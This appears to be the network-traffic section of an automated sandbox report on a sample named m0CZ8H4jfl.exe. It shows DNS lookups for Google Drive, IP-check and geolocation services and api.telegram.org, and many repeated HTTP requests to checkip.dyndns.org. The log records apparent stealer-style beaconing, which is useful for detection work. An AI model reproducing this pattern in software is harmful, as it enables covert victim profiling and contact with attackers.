                                                                                                        Jan 10, 2025 19:57:39.435915947 CET50048443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:57:39.435925961 CET44350048149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:57:39.435986042 CET50048443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:57:39.435992956 CET44350048149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:57:39.793164015 CET44350048149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:57:39.793546915 CET44350048149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:57:39.793591976 CET50048443192.168.2.9149.154.167.220
                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Jan 10, 2025 19:56:17.492767096 CET5632153192.168.2.91.1.1.1
                                                                                                        Jan 10, 2025 19:56:17.499944925 CET53563211.1.1.1192.168.2.9
                                                                                                        Jan 10, 2025 19:56:18.663100958 CET5129253192.168.2.91.1.1.1
                                                                                                        Jan 10, 2025 19:56:18.670830965 CET53512921.1.1.1192.168.2.9
                                                                                                        Jan 10, 2025 19:56:22.627509117 CET6254653192.168.2.91.1.1.1
                                                                                                        Jan 10, 2025 19:56:22.636420965 CET53625461.1.1.1192.168.2.9
                                                                                                        Jan 10, 2025 19:56:24.339093924 CET6395553192.168.2.91.1.1.1
                                                                                                        Jan 10, 2025 19:56:24.346666098 CET53639551.1.1.1192.168.2.9
                                                                                                        Jan 10, 2025 19:56:30.854527950 CET5615753192.168.2.91.1.1.1
                                                                                                        Jan 10, 2025 19:56:30.861440897 CET53561571.1.1.1192.168.2.9
                                                                                                        Jan 10, 2025 19:57:06.290363073 CET5510253192.168.2.91.1.1.1
                                                                                                        Jan 10, 2025 19:57:06.297399044 CET53551021.1.1.1192.168.2.9
                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                        Jan 10, 2025 19:56:17.492767096 CET192.168.2.91.1.1.10x5f86Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                        Jan 10, 2025 19:56:18.663100958 CET192.168.2.91.1.1.10x60eStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                        Jan 10, 2025 19:56:22.627509117 CET192.168.2.91.1.1.10xc16eStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                        Jan 10, 2025 19:56:24.339093924 CET192.168.2.91.1.1.10xc3b4Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                        Jan 10, 2025 19:56:30.854527950 CET192.168.2.91.1.1.10x7d30Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                        Jan 10, 2025 19:57:06.290363073 CET192.168.2.91.1.1.10xfd4aStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                        Jan 10, 2025 19:56:17.499944925 CET1.1.1.1192.168.2.90x5f86No error (0)drive.google.com142.250.185.110A (IP address)IN (0x0001)false
                                                                                                        Jan 10, 2025 19:56:18.670830965 CET1.1.1.1192.168.2.90x60eNo error (0)drive.usercontent.google.com142.250.185.161A (IP address)IN (0x0001)false
                                                                                                        Jan 10, 2025 19:56:22.636420965 CET1.1.1.1192.168.2.90xc16eNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                        Jan 10, 2025 19:56:22.636420965 CET1.1.1.1192.168.2.90xc16eNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                        Jan 10, 2025 19:56:22.636420965 CET1.1.1.1192.168.2.90xc16eNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                        Jan 10, 2025 19:56:22.636420965 CET1.1.1.1192.168.2.90xc16eNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                        Jan 10, 2025 19:56:22.636420965 CET1.1.1.1192.168.2.90xc16eNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                        Jan 10, 2025 19:56:22.636420965 CET1.1.1.1192.168.2.90xc16eNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                        Jan 10, 2025 19:56:24.346666098 CET1.1.1.1192.168.2.90xc3b4No error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                                        Jan 10, 2025 19:56:24.346666098 CET1.1.1.1192.168.2.90xc3b4No error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                                        Jan 10, 2025 19:56:24.346666098 CET1.1.1.1192.168.2.90xc3b4No error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                                        Jan 10, 2025 19:56:24.346666098 CET1.1.1.1192.168.2.90xc3b4No error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                                        Jan 10, 2025 19:56:24.346666098 CET1.1.1.1192.168.2.90xc3b4No error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                                        Jan 10, 2025 19:56:24.346666098 CET1.1.1.1192.168.2.90xc3b4No error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                                        Jan 10, 2025 19:56:24.346666098 CET1.1.1.1192.168.2.90xc3b4No error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                                        Jan 10, 2025 19:56:30.861440897 CET1.1.1.1192.168.2.90x7d30No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                        Jan 10, 2025 19:57:06.297399044 CET1.1.1.1192.168.2.90xfd4aNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                        • drive.google.com
                                                                                                        • drive.usercontent.google.com
                                                                                                        • reallyfreegeoip.org
                                                                                                        • api.telegram.org
                                                                                                        • checkip.dyndns.org
                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        0192.168.2.949975193.122.6.168807628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Jan 10, 2025 19:56:22.651230097 CET151OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Connection: Keep-Alive
                                                                                                        Jan 10, 2025 19:56:23.626229048 CET273INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 10 Jan 2025 18:56:23 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 104
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                        Jan 10, 2025 19:56:23.630548000 CET127OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Jan 10, 2025 19:56:23.843231916 CET273INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 10 Jan 2025 18:56:23 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 104
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                        Jan 10, 2025 19:56:30.658612967 CET127OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Jan 10, 2025 19:56:30.850446939 CET273INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 10 Jan 2025 18:56:30 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 104
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        1192.168.2.949979193.122.6.168807628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Jan 10, 2025 19:56:32.337862015 CET127OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Jan 10, 2025 19:56:32.987696886 CET273INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 10 Jan 2025 18:56:32 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 104
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        2192.168.2.949981193.122.6.168807628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Jan 10, 2025 19:56:33.871454954 CET151OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Connection: Keep-Alive
                                                                                                        Jan 10, 2025 19:56:34.519035101 CET273INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 10 Jan 2025 18:56:34 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 104
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        3192.168.2.949983193.122.6.168807628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Jan 10, 2025 19:56:35.703413010 CET151OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Connection: Keep-Alive
                                                                                                        Jan 10, 2025 19:56:36.331829071 CET273INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 10 Jan 2025 18:56:36 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 104
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        4192.168.2.949985193.122.6.168807628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Jan 10, 2025 19:56:37.695169926 CET151OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Connection: Keep-Alive
                                                                                                        Jan 10, 2025 19:56:38.349946022 CET273INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 10 Jan 2025 18:56:38 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 104
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        5192.168.2.949987193.122.6.168807628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Jan 10, 2025 19:56:39.500016928 CET151OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Connection: Keep-Alive
                                                                                                        Jan 10, 2025 19:56:40.242940903 CET273INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 10 Jan 2025 18:56:40 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 104
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        6192.168.2.949989193.122.6.168807628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Jan 10, 2025 19:56:41.497037888 CET151OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Connection: Keep-Alive
                                                                                                        Jan 10, 2025 19:56:42.144658089 CET273INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 10 Jan 2025 18:56:42 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 104
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        7192.168.2.949991193.122.6.168807628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Jan 10, 2025 19:56:43.151722908 CET151OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Connection: Keep-Alive
                                                                                                        Jan 10, 2025 19:56:43.768310070 CET273INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 10 Jan 2025 18:56:43 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 104
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        8192.168.2.949993193.122.6.168807628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Jan 10, 2025 19:56:44.724353075 CET151OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Connection: Keep-Alive
                                                                                                        Jan 10, 2025 19:56:45.430491924 CET273INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 10 Jan 2025 18:56:45 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 104
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        9192.168.2.949995193.122.6.168807628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Jan 10, 2025 19:56:46.570641994 CET151OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Connection: Keep-Alive
                                                                                                        Jan 10, 2025 19:56:47.220339060 CET273INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 10 Jan 2025 18:56:47 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 104
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        10192.168.2.949997193.122.6.168807628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Jan 10, 2025 19:56:48.252563953 CET151OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Connection: Keep-Alive
                                                                                                        Jan 10, 2025 19:56:48.906281948 CET273INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 10 Jan 2025 18:56:48 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 104
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        11192.168.2.949999193.122.6.168807628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Jan 10, 2025 19:56:50.115611076 CET151OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Connection: Keep-Alive
                                                                                                        Jan 10, 2025 19:56:50.741583109 CET273INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 10 Jan 2025 18:56:50 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 104
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        12192.168.2.950001193.122.6.168807628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Jan 10, 2025 19:56:52.045753002 CET151OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Connection: Keep-Alive
                                                                                                        Jan 10, 2025 19:56:52.690864086 CET273INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 10 Jan 2025 18:56:52 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 104
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        13192.168.2.950003193.122.6.168807628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Jan 10, 2025 19:56:53.778923988 CET151OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Connection: Keep-Alive
                                                                                                        Jan 10, 2025 19:56:54.443841934 CET273INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 10 Jan 2025 18:56:54 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 104
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        14192.168.2.950005193.122.6.168807628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Jan 10, 2025 19:56:55.403677940 CET151OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Connection: Keep-Alive
                                                                                                        Jan 10, 2025 19:56:56.106746912 CET273INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 10 Jan 2025 18:56:56 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 104
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
